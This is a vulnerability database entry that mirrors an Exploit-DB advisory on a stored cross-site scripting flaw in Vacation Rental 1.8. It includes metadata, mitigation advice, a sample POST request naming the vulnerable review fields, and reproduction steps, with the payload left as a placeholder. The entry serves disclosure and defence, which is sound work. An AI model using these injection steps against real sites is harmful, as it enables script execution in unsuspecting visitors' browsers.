header-logo
Suggest Exploit
vendor:
Vacation Rental
by:
CraCkEr
7.5
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Vacation Rental
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE:
CPE: a:gz_scripts:vacation_rental:1.8
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
2023

Vacation Rental 1.8 – Stored Cross-Site Scripting (XSS)

The Vacation Rental 1.8 software is vulnerable to stored cross-site scripting (XSS). The vulnerability exists in the 'username', 'title', and 'comment' parameters of the POST request. An attacker can inject malicious scripts into these parameters, which will be executed in the context of the victim's browser when they visit the affected page or the reviews page. This allows the attacker to manipulate the content of the site and potentially perform further attacks.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before displaying it on the website. This includes the 'username', 'title', and 'comment' fields. Additionally, the vendor should implement a review management section in the administration panel to allow for easy management of reviews.
Source

Exploit-DB raw data:

# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Stored XSS

------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1

property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------

POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS

## Steps to Reproduce:

1. Surf (as Guest) - Go to any Listed Property
2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS Fired on Local Browser
8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
Note: I think Administration Panel missing a section to Manage [Reviews] on the website
this feature must be added in next Updates [View/Edit/Delete]

Navigation

Suggest Exploit

Services By CQR